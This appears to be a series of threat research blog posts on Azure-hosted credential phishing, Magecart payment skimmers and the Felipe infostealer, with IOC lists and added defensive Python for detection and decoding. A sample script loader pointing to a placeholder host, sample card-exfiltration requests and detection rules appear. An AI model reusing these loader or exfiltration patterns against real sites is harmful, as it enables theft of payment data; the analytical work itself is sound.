In this method, attackers send the spam email with an attached HTML file that looks like a voice message. Once the user clicks the HTML file, it will redirect to the phishing page hosted using the Azure domain.
Fig 8: Spam mail with double extension method
Fig 9: Outlook login phishing page redirected from voice message
In this phishing campaign, the attackers have injected obfuscated JavaScript that checks the submitted credentials against those already present in their database, so that duplicates are not stored.
Fig 10: Obfuscated JavaScript to validate user credentials to avoid duplication
The following figure depicts the deobfuscated JavaScript. This code validates the user’s credential details and sends them to the attacker’s server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php).
Fig 11: Deobfuscated JavaScript
Fig 12: User data will be sent to the attacker’s site using the function getValidatorURL().
In addition to the Outlook phishing campaigns, we have seen phishing campaigns associated with these Azure domains: Microsoft phishing, OneDrive phishing, Adobe Document phishing, Blockchain phishing, and more. The following figures show the different phishing campaigns that are hosted using the Azure domain (Windows.net).
Fig 13: Microsoft login phishing page
Fig 14: Adobe login phishing page
Fig 15: Blockchain login phishing page
Fig 16: OneDrive login phishing page
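The hostnames in this campaign combine a legitimate Azure suffix with an account label that imitates a brand, sometimes with a digit swapped in (micr0soft) or a letter dropped (mcrosoft, ofice365). As an added example (not code from the post), the following Python scores such hostnames: it refangs the defanged notation used in the post, isolates the account label, and matches brand names exactly or within one edit after undoing lookalike digits. The brand and lure word lists are the author's choices; the first four sample hosts are taken from the post's indicators, the last two are constructed.

```python
import re

# Brands the post's phishing pages impersonated, plus generic credential-lure words.
BRANDS = ["microsoft", "outlook", "office365", "office", "onedrive", "sharepoint",
          "adobe", "blockchain", "exchange"]
LURE_WORDS = ["mail", "login", "signin", "secure", "support", "valid", "voice", "user", "account"]
AZURE_SUFFIXES = (".web.core.windows.net", ".blob.core.windows.net", ".azurewebsites.net")

SAMPLE_HOSTS = [
    "onemailofice365(.)z13(.)web(.)core(.)windows(.)net",        # from the post
    "mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net",  # from the post
    "mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net",  # from the post
    "validr2vtap2l3eh544kb(.)azurewebsites(.)net",               # from the post
    "mystaticsite(.)z13(.)web(.)core(.)windows(.)net",           # constructed benign name
    "login.microsoftonline.com",                                 # constructed, not Azure storage
]


def refang(value):
    """Turn the post's '(.)' / '[.]' defanged notation back into a plain lowercase hostname."""
    return value.strip().lower().replace("(.)", ".").replace("[.]", ".")


def account_label(host):
    """For <account>.z13.web.core.windows.net or <account>.blob.core.windows.net
    return (account, suffix); (None, None) if the host is not on an Azure suffix."""
    for suffix in AZURE_SUFFIXES:
        if host.endswith(suffix):
            return host[:-len(suffix)].split(".")[0], suffix
    return None, None


def normalize(label):
    """Undo lookalike digit substitutions (0->o, 1->l, 3->e, 5->s) and drop Azure's
    '-secondary' endpoint suffix so 'micr0soft' compares as 'microsoft'."""
    return re.sub(r"-secondary$", "", label).translate(str.maketrans("0135", "oles"))


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fuzzy_contains(text, word):
    """True if some window of text is within one edit of word."""
    n = len(word)
    for width in (n - 1, n, n + 1):
        for start in range(max(1, len(text) - width + 1)):
            if levenshtein(text[start:start + width], word) <= 1:
                return True
    return False


def brand_hits(label):
    """Brands found in the raw label or its normalized form; digits inside a brand
    (office365) are kept by also matching the raw label. Fuzzy matching is limited
    to brands of six or more characters to keep false positives down."""
    variants = {label, normalize(label)}
    hits = set()
    for brand in BRANDS:
        for v in variants:
            if brand in v or (len(brand) >= 6 and fuzzy_contains(v, brand)):
                hits.add(brand)
                break
    if "office365" in hits:
        hits.discard("office")  # do not count the same brand twice
    return hits


def assess(indicator):
    """Score one hostname: 2 points per brand, 1 per lure word; 2 or more is suspicious."""
    host = refang(indicator)
    account, suffix = account_label(host)
    if account is None:
        return {"host": host, "azure": False, "score": 0, "brands": [], "suspicious": False}
    brands = sorted(brand_hits(account))
    lures = sorted(w for w in LURE_WORDS if w in normalize(account))
    score = 2 * len(brands) + len(lures)
    return {"host": host, "azure": True, "account": account, "suffix": suffix,
            "brands": brands, "lures": lures, "score": score, "suspicious": score >= 2}


if __name__ == "__main__":
    for sample in SAMPLE_HOSTS:
        print(assess(sample))
```

Random account names such as the exfiltration host above score low on this check alone, which is why the post's blocking relied on observed behaviour as well as names.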
Conclusion
The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud.
Fig 17: Detected phishing hits
Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs
IOCs
039282fsd(.)z19(.)web(.)core(.)windows(.)net
3652adua38ea(.)z5(.)web(.)core(.)windows(.)net
378468459jjn(.)z19(.)web(.)core(.)windows(.)net
623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net
86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net
accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net
accountsupdate(.)z22(.)web(.)core(.)windows(.)net
adobe111(.)z19(.)web(.)core(.)windows(.)net
appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net
bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net
bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net
blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net
blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net
blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net
businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net
dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net
dlgweu(.)blob(.)core(.)windows(.)net driveoffice-
secondary(.)z13(.)web(.)core(.)windows(.)net
eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net
edustudioapp(.)z19(.)web(.)core(.)windows(.)net
exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net
finance51(.)z13(.)web(.)core(.)windows(.)net
fukshawefwe22(.)blob(.)core(.)windows(.)net
fundingmessan(.)z13(.)web(.)core(.)windows(.)net
gry1asdqw1(.)blob(.)core(.)windows(.)net
h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net
hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net
hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net
hsdv(.)blob(.)core(.)windows(.)net
linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net
lpdmsonline(.)blob(.)core(.)windows(.)net
macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net
macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net
mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net
mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net
mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net
mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net
mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net
mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net
mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net
mdj34598720843(.)z10(.)web(.)core(.)windows(.)net
microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net
micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net
microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net
microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net
microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net
microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net
microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net
microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net
microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net
microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net
offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net
officcee(.)z13(.)web(.)core(.)windows(.)net
office365user37773773673(.)z19(.)web(.)core(.)windows(.)net
officedelist(.)z13(.)web(.)core(.)windows(.)net
officefiledata(.)z13(.)web(.)core(.)windows(.)net
onemailofice365(.)z13(.)web(.)core(.)windows(.)net
outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net
outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net
outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net
outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net
outlookofficecom(.)z33(.)web(.)core(.)windows(.)net
outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net
outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net
parmalat7(.)blob(.)core(.)windows(.)net
pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net
pssastd(.)blob(.)core(.)windows(.)net
rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net
sams2948818388301(.)z13(.)web(.)core(.)windows(.)net
secureofficeportal(.)z19(.)web(.)core(.)windows(.)net
sharepo7(.)z22(.)web(.)core(.)windows(.)net
sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net
supportoffices365(.)z33(.)web(.)core(.)windows(.)net
thursday(.)z19(.)web(.)core(.)windows(.)net
ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net
under12(.)z19(.)web(.)core(.)windows(.)net
user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net
user37377377733(.)z22(.)web(.)core(.)windows(.)net
user7779793e792782(.)z14(.)web(.)core(.)windows(.)net
user8877773737(.)z11(.)web(.)core(.)windows(.)net
usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net
v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net
validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net
voice88(.)z19(.)web(.)core(.)windows(.)net
voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net
webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net
were12(.)z19(.)web(.)core(.)windows(.)net
weree(.)z6(.)web(.)core(.)windows(.)net
wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net
yamma(.)z13(.)web(.)core(.)windows(.)net
zebra11(.)z19(.)web(.)core(.)windows(.)net
azaman(.)blob(.)core(.)windows(.)net
dlgeus(.)blob(.)core(.)windows(.)net
dlgneu(.)blob(.)core(.)windows(.)net
fiattt(.)blob(.)core(.)windows(.)net
fukshawefwe22(.)blob(.)core(.)windows(.)net
gry1asdqw1(.)blob(.)core(.)windows(.)net
hsdv(.)blob(.)core(.)windows(.)net
parmalat7(.)blob(.)core(.)windows(.)net
funksha1(.)blob(.)core(.)windows(.)net
Categories: Security Posts
Magecart activity and campaign enhancements
Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we’ve seen and some enhancements in the campaign.
Magecart attack chain
In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now being injected directly into the compromised e-commerce sites, whereas in earlier attacks, the malicious code was injected remotely.
Fig 1: Hits of compromised websites in the last three months
1. Injecting heavily obfuscated malicious JavaScript dynamically
The credit card stealer JavaScript payload shown below is loaded dynamically when the victim presses the checkout button after loading the cart.
Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page
The ThreatLabZ team’s smart crawler with heuristic detection shows that various JavaScript functions are obfuscated in the payload.
Fig 3: Crawler’s heuristic detection
Fig 4: Malicious script after three levels of deobfuscation by the crawler.
Analysis of the skimming toolkit
The malicious script discussed above looks for the keywords “onepage|checkout|onestep|firecheckout” in the URL and, if found, injects another script from hxxps://dnsden[.]biz/a.js.
Fig 5: Script injected from hxxps://dnsden[.]biz
The injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data, which is decrypted with the RC4 algorithm at runtime.
Fig 6: Use of RC4 algorithm in ‘a.js’
The encrypted data in ‘a.js’ script after RC4 decryption ends up injecting the main skimming script, which is responsible for extracting and sending the victim's credit card details back to the attacker.
Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI=
Decrypted data -
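The decryption pipeline described above (Base64 layer, then RC4), as an added analyst helper that is not part of the original post or of the skimmer's code. The RC4 key used by a.js is not given in the post, so the block builds a constructed blob with a constructed key and round-trips it; the handling of the Base64 layer assumes the common browser-side pattern of storing ciphertext bytes in a JavaScript string that is UTF-8 encoded before Base64, which is an assumption, not something the post states. The try_keys helper shows how candidate key strings pulled out of a loader can be tested without reading the output by hand.

```python
import base64
import string
from typing import Iterable, Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 from scratch: key scheduling followed by keystream XOR.
    RC4 is symmetric, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def blob_to_ciphertext(b64_blob: str) -> bytes:
    """Undo the Base64 layer.
    Assumption: the ciphertext was held in a JavaScript string and UTF-8 encoded
    before Base64, so a clean UTF-8 decode whose code points all fit in one byte
    is mapped back to raw bytes; anything else is treated as raw binary."""
    raw = base64.b64decode(b64_blob)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw
    if all(ord(ch) < 256 for ch in text):
        return text.encode("latin-1")
    return raw


def decode_skimmer_blob(b64_blob: str, key: str) -> str:
    """Base64 -> RC4 -> text, the order the post describes for a.js."""
    plain = rc4(key.encode("utf-8"), blob_to_ciphertext(b64_blob))
    return plain.decode("utf-8", errors="replace")


def printable_ratio(text: str) -> float:
    if not text:
        return 0.0
    return sum(1 for ch in text if ch in string.printable) / len(text)


def try_keys(b64_blob: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate key whose decryption is almost entirely
    printable text; a wrong RC4 key yields byte noise that fails this test."""
    for key in candidates:
        if printable_ratio(decode_skimmer_blob(b64_blob, key)) >= 0.95:
            return key
    return None


def encode_like_skimmer(plaintext: str, key: str) -> str:
    """Inverse pipeline, used only to build the constructed sample below."""
    cipher = rc4(key.encode("utf-8"), plaintext.encode("utf-8"))
    return base64.b64encode(cipher.decode("latin-1").encode("utf-8")).decode("ascii")


# Constructed sample (not the post's blob or key): a one-line second-stage loader.
SAMPLE_KEY = "k3y-constructed"
SAMPLE_PLAINTEXT = (
    "var s=document.createElement('script');"
    "s.src='https://example.invalid/universal.js';document.head.appendChild(s);"
)
SAMPLE_BLOB = encode_like_skimmer(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print("key found:", try_keys(SAMPLE_BLOB, ["wrong-guess", SAMPLE_KEY]))
    print(decode_skimmer_blob(SAMPLE_BLOB, SAMPLE_KEY))
```

The printable-ratio threshold is deliberately strict: a wrong key turns almost every byte into noise, so any candidate that decrypts to near-100% printable text is the real one, and the analyst then reads the recovered loader rather than a dump of every attempt.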
The ‘universal.js’ script is also obfuscated and uses the same encryption scheme as ‘a.js’. After decryption, it registers a handler on the form change event and collects all the payment information entered by the victim.
Fig 7: Collecting payment card details
Fig 8: Sends victim’s credit card details to C&C
Fig 9: POST request with the stolen credit card details
info=Base64(stolen_data)&hostname=compromised_site&key=random_key
Stolen data includes billing and payment details.
Fig 10: Decoded stolen data
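A detection for the exfiltration request shown in Fig 9, as an added example that is not code from the original post. It scans constructed proxy log lines (tab-separated timestamp, method, URL and body; the format is an assumption for this example) for two signals: a destination host in the post's IOC list, and a POST body with the exact shape info=Base64(stolen_data)&hostname=…&key=…, so an unseen gate is still caught by shape. Only the field names of the decoded payload are returned, never the values, so alerts do not carry card data.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Exfiltration endpoints from the post's IOC list, defanging brackets removed
# so they match real log data.
SKIMMER_GATES = {
    "dnsden.biz", "jquery-bin.com", "lumbertrans.com", "luxbagsgirl.com",
    "jsreload.pw", "saterday-race.com", "jqueryextd.at", "routingzen.com",
    "mz-at-shop.de", "93.187.129.249", "developer-js.info",
    "google-anaiytic.com", "magento-analytics.com", "gtows.com",
}

# Body shape from Fig 9: info=Base64(stolen_data)&hostname=compromised_site&key=random_key
EXFIL_BODY_RE = re.compile(r"(^|&)info=[^&]+&hostname=[^&]+&key=[^&]+($|&)")


def decode_info_fields(b64: str) -> Optional[List[str]]:
    """Decode the Base64 'info' value and return only the field names inside it."""
    try:
        payload = base64.b64decode(b64).decode("utf-8", errors="replace")
    except ValueError:
        return None
    return sorted(parse_qs(payload, keep_blank_values=True).keys())


def inspect_request(method: str, url: str, body: str) -> Optional[dict]:
    host = urlsplit(url).hostname or ""
    known = host in SKIMMER_GATES
    shape = bool(EXFIL_BODY_RE.search(body))
    if not (known or (method == "POST" and shape)):
        return None
    fields = parse_qs(body, keep_blank_values=True)
    info = fields.get("info", [""])[0]
    return {
        "gate": host,
        "known_ioc": known,
        "body_shape_match": shape,
        "victim_site": fields.get("hostname", [""])[0],
        "stolen_fields": decode_info_fields(info) if info else [],
    }


def scan_log(lines) -> List[dict]:
    """One request per line: timestamp, method, URL, body (tab-separated; constructed format)."""
    alerts = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 4:
            continue
        _ts, method, url, body = parts
        alert = inspect_request(method, url, body)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample traffic. The card number is a placeholder, not real data.
_STOLEN = "firstname=Jane&lastname=Doe&cc_number=0000000000000000&cc_exp=12/24&cc_cvv=000"
_INFO = base64.b64encode(_STOLEN.encode()).decode()
_EXFIL_BODY = urlencode({"info": _INFO, "hostname": "shop.example.invalid", "key": "a1b2c3"})
SAMPLE_LOG = [
    "2019-06-10T12:00:01Z\tPOST\thttps://jquery-bin.com/gate.php\t" + _EXFIL_BODY,
    "2019-06-10T12:00:02Z\tPOST\thttps://cdn.example.invalid/gate.php\t" + _EXFIL_BODY,
    "2019-06-10T12:00:03Z\tPOST\thttps://shop.example.invalid/checkout\tq=search&page=2",
    "2019-06-10T12:00:04Z\tGET\thttps://dnsden.biz/a.js\t",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The second sample line goes to a host that is not in the IOC list and is still flagged on body shape alone; the GET to a listed host is flagged on the host match even though there is no body to inspect.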
2. Injecting malicious JavaScript directly in the compromised site
Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected
Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details
Analysis of the skimming toolkit
The malicious JavaScript code first checks for the two cookies named “$s” and “$sent”; if they are set, their decoded values are stored in variables. These cookie values are consulted each time payment card details are entered, and they are updated when the details are new.
Fig 13: Getting values from the two cookie names “$s” and “$sent”
To collect payment card details, the script gathers the values of all input, select, and textarea elements and then performs a basic length check on the card details.
Fig 14: Validating length of payment card details
After validating payment card details, a hash of the card details is calculated and checked to determine if the same hash value is available in the data retrieved from the cookie “$sent” earlier. Payment details are dropped if any hash match is found.
Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie
Each time any new payment card details are entered, the details are sent to the attacker and the hash value for these details is appended to the cookie value “$sent”; this cookie value is used to check if the details being entered are new.
Fig 16: Value of the cookie “$sent” stored in the victim's browser
On decoding the above Base64-encoded value of the cookie “$sent,” we get an array of MD5 hashes of the payment card details. By storing these hashes in a cookie, the attacker has added the ability to drop duplicate details: every new entry is checked against the cookie value, and only card details that have not been seen before are sent to the attacker.
Once all the above checks pass, the encoded payment card details are sent to the attacker-controlled site.
Fig 17: GET request with the stolen information
In a similar skimming toolkit, along with the above-discussed cookie logic, attackers are injecting fake payment card fields into the compromised site and hiding legitimate fields once the victim selects credit card as the payment method.
Fig 18: Fake credit card details field and malicious JavaScript file
Fig 19: HTML code for the fake credit card details fields in the malicious script
Fig 20: Malicious script injecting the fake credit card details fields
Fig 21: Above, injected credit card fields; below, legitimate credit card fields
The injected and legitimate credit card fields look similar, but from the HTML input field attributes (ID and type), there are noticeable differences. In the injected fields, the card number ID is "_ccnumber" and the type is "text," while in a legitimate card number, the ID is "credit-card-number" and the type is "tel."
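A page audit for the injected-field technique shown in Figs 18 to 21, as an added example that is not code from the original post. It parses checkout HTML, finds every input that looks like a card-number field (by id, name or autocomplete attribute, compared with separators stripped so both "_ccnumber" and "credit-card-number" match), and reports the conditions the post describes: two card-number fields on one page, a type mismatch between them (text versus tel), and a legitimate field hidden while a duplicate stays visible. The sample HTML is constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import List

# Normalised identifiers that a card-number input tends to carry.
# "credit-card-number" normalises to "creditcardnumber", which contains "cardnumber";
# autocomplete="cc-number" normalises to "ccnumber".
CARD_NUMBER_HINTS = ("ccnumber", "cardnumber")


def _normalize(value: str) -> str:
    return re.sub(r"[^a-z0-9]", "", value.lower())


class _InputCollector(HTMLParser):
    """Collects the attributes of every <input> element in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: List[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs: dict) -> bool:
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    return (
        attrs.get("type", "").lower() == "hidden"
        or "display:none" in style
        or "visibility:hidden" in style
    )


def card_number_inputs(html: str) -> List[dict]:
    parser = _InputCollector()
    parser.feed(html)
    found = []
    for attrs in parser.inputs:
        ident = _normalize(attrs.get("id", "") + attrs.get("name", "") + attrs.get("autocomplete", ""))
        if any(hint in ident for hint in CARD_NUMBER_HINTS):
            found.append({
                "id": attrs.get("id", ""),
                "name": attrs.get("name", ""),
                "type": attrs.get("type", "text").lower(),
                "hidden": _is_hidden(attrs),
            })
    return found


def audit_card_fields(html: str) -> dict:
    """Flags the overlay pattern: a second card-number input, a different input type,
    or a hidden card-number field sitting next to a visible one."""
    inputs = card_number_inputs(html)
    types = {i["type"] for i in inputs}
    hidden = [i for i in inputs if i["hidden"]]
    visible = [i for i in inputs if not i["hidden"]]
    findings = {
        "card_inputs": inputs,
        "duplicate_card_fields": len(inputs) > 1,
        "type_mismatch": len(types) > 1,
        "hidden_and_visible_pair": bool(hidden) and bool(visible),
    }
    findings["suspicious"] = any(
        findings[k] for k in ("duplicate_card_fields", "type_mismatch", "hidden_and_visible_pair")
    )
    return findings


# Constructed checkout fragment: an injected field plus the site's own field,
# hidden the way the post describes.
SAMPLE_CHECKOUT_HTML = """
<form id="checkout">
  <input id="_ccnumber" type="text" placeholder="Card number">
  <input id="_ccexp" type="text" placeholder="MM/YY">
  <input id="credit-card-number" type="tel" autocomplete="cc-number" style="display: none;">
  <input id="email" type="email">
</form>
"""

CLEAN_CHECKOUT_HTML = """
<form id="checkout">
  <input id="credit-card-number" type="tel" autocomplete="cc-number">
  <input id="email" type="email">
</form>
"""

if __name__ == "__main__":
    print(audit_card_fields(SAMPLE_CHECKOUT_HTML))
    print(audit_card_fields(CLEAN_CHECKOUT_HTML))
```

Run this against a stored copy of the checkout page from a crawler or a browser automation job; a page that normally has exactly one card-number input and suddenly reports two is the cheapest signal in the post to alert on.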
IOCs
dnsden[.]biz
jquery-bin[.]com/gate[.]php
lumbertrans[.]com/errors/default/gate[.]php
luxbagsgirl[.]com/errors/default/gate[.]php
jsreload[.]pw/gate[.]php
saterday-race[.]com/gate[.]php
jqueryextd[.]at/gate[.]php
routingzen[.]com/gate[.]php
mz-at-shop[.]de/errors/default/gate[.]php
93[.]187[.]129[.]249/gate[.]php
developer-js[.]info/gate[.]php
google-anaiytic[.]com/fonts[.]googleapis/gate[.]php
magento-analytics[.]com/gate[.]php
gtows[.]com
Compromised sites
shop.triggerbrothers[.]com[.]au
custommagnetsdirect[.]com
lumbertrans[.]com
sunbuggy[.]com
saterday-race[.]com
windblox[.]com
cakedecoratingsolutions[.]com[.]au
network-ed[.]com[.]au
adooq[.]com
mz-at-shop[.]des
reddotarms[.]com
sprucela[.]com/
t[.]cltradingfl[.]com
worldcraftindustries[.]com
reallifecatholic[.]com
wbminternational[.]com
whistlerrides[.]ca/
smartsilk[.]com/
classictruckglass[.]com
oconnellsclothing[.]com/skin/
purefruittechnologies[.]com/
cornerstone-arch[.]com
minitruckusa[.]com
magformers[.]com
ravishingcosmetics[.]com
alamoshoes[.]com/
salonsavings[.]com/
bathroompanelsuperstore[.]com
britishfitness[.]com
bumperworksonline[.]com
niftyconcept[.]com
cornerstone-arch[.]com
decorprice[.]com
Conclusion
These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data.
Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.
Felipe, a new infostealer Trojan
The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.
The files dropped by the malware include:
Win XP:
%UserProfile%\Local Settings\Temp\vshost.exe
%UserProfile%\Local Settings\Temp\explorer32.exe
%UserProfile%\Local Settings\Temp\install2.bat
%UserProfile%\Local Settings\Temp\infect.txt
Win7/Win10:
%UserProfile%\AppData\Local\Temp\vshost.exe
%UserProfile%\AppData\Local\Temp\explorer32.exe
%UserProfile%\AppData\Local\Temp\install2.bat
%UserProfile%\AppData\Local\Temp\infect.txt
The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking for the files vshost32.exe and vshost64.exe on the compromised system.
The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.
Once the update2804 folder has been created, the malware downloads its various payloads with a delay of just 50 milliseconds between them.
After downloading the payloads, the malware copies them into a hidden temp folder on the system and executes them: first install2.bat, then vshost.exe.
Below is the code of install2.bat:
The batch file makes registry changes that do the following:
Add Run entries for vshost.exe and explorer32.exe to ensure persistence
Disable Windows Defender
Bypass UAC
Exclude the temp folder path from Windows Defender scanning
vshost.exe validates the victim's bank card numbers by checking the card length or the leading digits, for example:
American Express: number must begin with 34 or 37
Visa: card length between 13 and 16
Mastercard: card length of 16
Discover: card length of 16 and number begins with 6011 or 65
Below is a snapshot of some of these instructions:
The following is the algorithm used to check a card number's validity:
Process the digits from right to left, doubling every alternate digit.
Where doubling produces a two-digit value, add its digits together (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)).
Return the 10's complement of the total.
Finally, it verifies the check digit: the number is invalid if the total is not a multiple of 10.
Snapshot of the algorithm:
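The card validation described above is the standard mod-10 (Luhn) check; the block below is an added example that is not code from the post or from the malware, written to show what vshost.exe's checks accept and reject. The brand rules are implemented exactly as the post lists them for the sample, which makes them deliberately loose (no prefix test for Visa or Mastercard), so a number can match more than one brand; the numbers used in the usage section are publicly documented test numbers, not real cards.

```python
from typing import List


def luhn_valid(number: str) -> bool:
    """Mod-10 check as described in the post: walking from the right, double every
    second digit (the check digit itself is not doubled), fold two-digit results
    back to one digit (18 -> 1 + 8 = 9, equivalently subtract 9), and require the
    total to be a multiple of 10."""
    digits = [int(c) for c in number if c.isdigit()]
    if len(digits) < 2:
        return False
    total = 0
    for pos, d in enumerate(reversed(digits)):
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def matching_brands(number: str) -> List[str]:
    """Brand rules as the post lists them for vshost.exe. They overlap on purpose
    so the caller can see how coarse the malware's classification is."""
    n = "".join(c for c in number if c.isdigit())
    brands = []
    if n.startswith(("34", "37")):
        brands.append("American Express")
    if 13 <= len(n) <= 16:
        brands.append("Visa")
    if len(n) == 16:
        brands.append("Mastercard")
    if len(n) == 16 and n.startswith(("6011", "65")):
        brands.append("Discover")
    return brands


def classify(number: str) -> dict:
    """What the malware's two-stage filter would conclude about one candidate string."""
    return {"luhn_valid": luhn_valid(number), "brands": matching_brands(number)}


if __name__ == "__main__":
    # Publicly documented test numbers (constructed input, not real cards).
    for candidate in ("4111 1111 1111 1111", "4111111111111112", "378282246310005", "6011111111111117"):
        print(candidate, classify(candidate))
```

A 16-digit number that passes the mod-10 check is reported as both Visa and Mastercard under these rules, and a 15-digit American Express number also satisfies the Visa length rule; that overlap is a property of the sample's checks, not of the card networks.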
If the system is already infected, the malware looks for the file infect.txt in the temp folder. If it is already there, it sends the data shown below; otherwise, it sends a request to the C&C to download the file infect.txt. It also sends the victim's system information and writes “infect” into the infect.txt file.
